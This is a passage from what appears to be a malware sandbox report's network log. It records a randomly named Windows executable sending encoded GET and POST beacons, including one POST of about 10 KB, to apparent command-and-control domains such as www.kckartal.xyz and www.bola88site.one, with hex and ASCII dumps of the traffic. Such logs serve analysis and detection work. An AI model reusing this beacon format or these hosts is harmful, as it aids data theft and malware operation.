                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      28 | 192.168.2.4 | 49765 | 172.96.191.39 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:10.541189909 CEST | 461 | OUT | GET /3lkx/?chHT=RihUS+ZcBcWtP49cUqKa3/5xmWqGYNk0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4ueBHr6qafW/u83WMg9sFtSHOnpje/7KsHpWM=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.bola88site.one
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:50:11.450560093 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      content-type: text/html
                      content-length: 796
                      date: Tue, 10 Sep 2024 06:50:11 GMT
                      server: LiteSpeed
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      29 | 192.168.2.4 | 49766 | 104.21.20.125 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:16.509829044 CEST | 722 | OUT | POST /h5qr/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.kckartal.xyz
                      Origin: http://www.kckartal.xyz
                      Referer: http://www.kckartal.xyz/h5qr/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 65 5a 65 68 70 55 53 32 50 72 75 39 32 37 71 71 62 66 55 46 4e 69 6e 32 50 4e 4e 6d 71 39 54 31 4c 49 71 49 61 78 77 70 6f 4b 53 63 56 66 77 41 4f 75 69 4e 63 30 53 45 61 64 72 38 46 4e 6c 32 6e 4a 52 63 63 32 30 6f 4a 41 33 35 72 71 67 52 36 69 4c 67 7a 37 58 62 39 79 72 66 34 49 2b 49 53 78 33 42 2b 43 4b 69 6a 31 6c 58 61 79 6f 4d 63 6c 73 6e 34 41 36 4f 51 73 74 53 35 70 4d 65 77 77 56 47 59 70 46 4c 4d 66 2b 47 4a 72 49 43 43 66 30 74 61 2b 6d 6a 63 72 74 65 62 74 57 41 65 7a 38 51 4c 51 37 41 56 55 6f 30 6e 31 74 6d 7a 42 52 70 67 3d 3d
                      Data Ascii: chHT=yZO9aB74W3A3ueZehpUS2Pru927qqbfUFNin2PNNmq9T1LIqIaxwpoKScVfwAOuiNc0SEadr8FNl2nJRcc20oJA35rqgR6iLgz7Xb9yrf4I+ISx3B+CKij1lXayoMclsn4A6OQstS5pMewwVGYpFLMf+GJrICCf0ta+mjcrtebtWAez8QLQ7AVUo0n1tmzBRpg==
                      Sep 10, 2024 08:50:17.106955051 CEST | 745 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:50:17 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      vary: User-Agent
                      x-turbo-charged-by: LiteSpeed
                      cf-cache-status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLEcc1cLL1ICigzoYDwASGAgP1R7KckHMuoiluxx1k1kBejQlHb5JuX0vYDADojZfx5zWhPBL0RBqxZf86Pr%2BnAC8nwtp8%2FANO6VMCbJ9s0Z4yISbJqWLz3nONEyZ1MOjXLZ"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8c0d7b9fa90e7290-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                      Data Ascii: f
                      Sep 10, 2024 08:50:17.108196974 CEST | 735 | IN | Data Raw: 32 63 33 0d 0a 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07
                      Data Ascii: 2c3dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhy


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      30 | 192.168.2.4 | 49767 | 104.21.20.125 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:19.098897934 CEST | 742 | OUT | POST /h5qr/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.kckartal.xyz
                      Origin: http://www.kckartal.xyz
                      Referer: http://www.kckartal.xyz/h5qr/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 70 54 79 76 45 71 4a 65 6c 77 75 6f 4b 53 55 31 66 78 45 4f 75 70 4e 63 34 67 45 59 35 72 38 46 5a 6c 32 6e 5a 52 64 72 69 33 71 5a 41 69 30 4c 71 69 50 4b 69 4c 67 7a 37 58 62 39 4f 42 66 34 77 2b 49 43 42 33 44 63 6e 63 38 54 31 6d 57 61 79 6f 65 73 6c 6f 6e 34 42 5a 4f 56 31 4b 53 37 68 4d 65 79 34 56 46 4d 39 61 42 4d 66 34 43 4a 71 67 44 32 47 47 6b 2f 62 30 6e 64 48 6b 54 71 35 41 46 59 69 6d 42 36 78 73 53 56 77 62 70 67 38 5a 72 77 38 59 79 73 69 65 5a 39 79 49 4a 31 53 38 44 6e 64 38 6a 37 31 6b 49 50 63 3d
                      Data Ascii: chHT=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYpTyvEqJelwuoKSU1fxEOupNc4gEY5r8FZl2nZRdri3qZAi0LqiPKiLgz7Xb9OBf4w+ICB3Dcnc8T1mWayoeslon4BZOV1KS7hMey4VFM9aBMf4CJqgD2GGk/b0ndHkTq5AFYimB6xsSVwbpg8Zrw8YysieZ9yIJ1S8Dnd8j71kIPc=
                      Sep 10, 2024 08:50:19.681222916 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:50:19 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      vary: User-Agent
                      x-turbo-charged-by: LiteSpeed
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qv5WW7UKpXlD%2BkuY5mdUWVBDlLL%2FIu3OVU7KT2MEsVo0bySIRz1%2F%2BJebXGhkS7eHtVspHkHivZpQZUf%2BAwSHrvUycTxLjwGvNcstzZBCoIKGlCQP9MWGLPiwRfNhpAThIaW%2B"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8c0d7bafccea7cee-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                      Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9S
                      Sep 10, 2024 08:50:19.681370020 CEST | 237 | IN | Data Raw: fa 53 85 06 a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04
                      Data Ascii: SM[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      31 | 192.168.2.4 | 49768 | 104.21.20.125 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:21.646965027 CEST | 10824 | OUT | POST /h5qr/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.kckartal.xyz
                      Origin: http://www.kckartal.xyz
                      Referer: http://www.kckartal.xyz/h5qr/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 78 54 31 63 4d 71 49 38 4e 77 76 6f 4b 53 61 56 66 30 45 4f 75 4f 4e 64 52 70 45 59 30 55 38 47 68 6c 77 45 68 52 55 36 69 33 77 4a 41 69 39 72 71 6a 52 36 6a 44 67 79 4c 54 62 35 75 42 66 34 77 2b 49 42 4a 33 45 4f 44 63 2b 54 31 6c 58 61 7a 70 4d 63 6c 4d 6e 34 34 69 4f 52 70 77 52 49 35 4d 65 53 49 56 4a 66 46 61 4e 4d 66 36 50 70 71 34 44 7a 65 64 6b 37 37 47 6e 64 44 64 54 71 4e 41 48 66 6a 69 46 36 74 6d 45 6b 74 42 36 43 4d 46 6e 48 49 7a 33 4c 79 2f 52 4e 6e 53 4c 6d 2b 45 4a 47 6c 30 38 62 74 67 52 61 68 50 70 6f 54 4a 64 6f 36 6d 6d 33 32 68 69 54 41 67 43 71 4a 70 4f 48 44 45 4a 56 42 32 56 53 75 5a 7a 31 36 62 58 37 7a 43 67 54 57 37 52 57 35 7a 50 69 37 46 36 6e 34 51 78 67 42 33 4e 58 69 45 6e 56 66 46 51 50 55 78 36 78 37 44 72 39 72 57 50 65 57 49 43 48 6b 52 78 68 6d 6e 71 41 58 46 6f 41 75 45 41 63 56 58 37 58 67 4f 32 63 39 30 67 59 42 41 7a [TRUNCATED]
                      Data Ascii: chHT=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYxT1cMqI8NwvoKSaVf0EOuONdRpEY0U8GhlwEhRU6i3wJAi9rqjR6jDgyLTb5uBf4w+IBJ3EODc+T1lXazpMclMn44iORpwRI5MeSIVJfFaNMf6Ppq4Dzedk77GndDdTqNAHfjiF6tmEktB6CMFnHIz3Ly/RNnSLm+EJGl08btgRahPpoTJdo6mm32hiTAgCqJpOHDEJVB2VSuZz16bX7zCgTW7RW5zPi7F6n4QxgB3NXiEnVfFQPUx6x7Dr9rWPeWICHkRxhmnqAXFoAuEAcVX7XgO2c90gYBAzrDY8vALwSaSam543Bqu3cinwRNezkbD/O6lBsXnwpdGif8b93+Y1NUa61qkVE4MszyQydvWkaxghowpT8tQPhsyKBVB1TxSj65X5hgJ0hDDKLqNBKnI5LPd25Ih3xI86HyAVuoSqufoDRguMbXnhCmTgZbPDsNR2VaE2/fF1XMd9uCqsiaZQTOHRSlaNbZfMDOo+3SUKSF00q4hK0sJq3ApsaKePTpB5jXuUPbsTEGrnqCMJlhAWrATyuA8ovqWL6KSdc7RtTKdbwULBWSDvRBwXUZSQyFgldew5BA+YucX5qj4blfp+jAwx6AfTUnSDUtUq8E2IDdNGoY8AC6Q+r/iOsNYXfRnOU9AgrA2752b5UNPzJjPq/u5M6KpO6NVmPC55k7N9x1ZgyJzLDD2LPys5rSGNWRVppup5YYtM8AZhi06SmBXONE4MYYG7+KsSMUWTdfJHWj13WdXIu1+ntwAyhWWS0lVfxRm4/WcGDUc/6zJ9/8EMk5iaAA1J8ii+0iCIYVeH3e5YWXW2pFiTi/K0Lyx4WGYFMgt80X1C3llsRqNB99aMai7PjZIGq7EPJVnM+G1SOk7iYpRxa/dYSd18CvF+F/fioFITuVCD6HdyCWBh7hr1ZNHwXzjgvpBxx657ZiLqvLeiPQnpw1/opzKfsqjeB3kYFd [TRUNCATED]
                      Sep 10, 2024 08:50:22.233865023 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:50:22 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      vary: User-Agent
                      x-turbo-charged-by: LiteSpeed
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2m%2Bncc8eGcdlDIJmomxfM4k%2F6WkBYGWB5M9SBzAvpF4WNGSCGo4VGHYGtb9R38cnD1quIsaVfXr35WiJ9ZAbjVTAjkRd0Hp2yMXzs1s3mDMAQ69MNoM36PMrMps%2B%2BiKr9F1"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8c0d7bbfbfa01821-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                      Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                      Sep 10, 2024 08:50:22.233880043 CEST | 233 | IN | Data Raw: a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72
                      Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      32 | 192.168.2.4 | 49769 | 104.21.20.125 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:24.191428900 CEST | 459 | OUT | GET /h5qr/?chHT=/bmdZ0vLXnogocV0iYIh9qPv22C1+ePhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5evw/1eyPyHW7+NkDn/WIzzX8wvew4kJYzT8Us=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.kckartal.xyz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:50:24.776423931 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:50:24 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                      pragma: no-cache
                      vary: User-Agent
                      x-turbo-charged-by: LiteSpeed
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGp%2Ft1aV%2Bhqq2w7fdEl%2FHfZElDFK20CfwsZ1tcFqO%2BSVUMOKziATmlnZcbtspJ4N1iMUFzadvRbw2C8tJp%2FWyOctwGoteIrMAcNtP6A9wkGBdW7HepNjneLJYmLIrw9ieIP7"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8c0d7bcfab30c47c-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                      Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolut
                      Sep 10, 2024 08:50:24.776447058 CEST | 734 | IN | Data Raw: 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74
                      Data Ascii: e; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      33 | 192.168.2.4 | 49770 | 43.242.202.169 | 80 | 1880 | C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 10, 2024 08:50:30.473124027 CEST | 722 | OUT | POST /ed2j/ HTTP/1.1
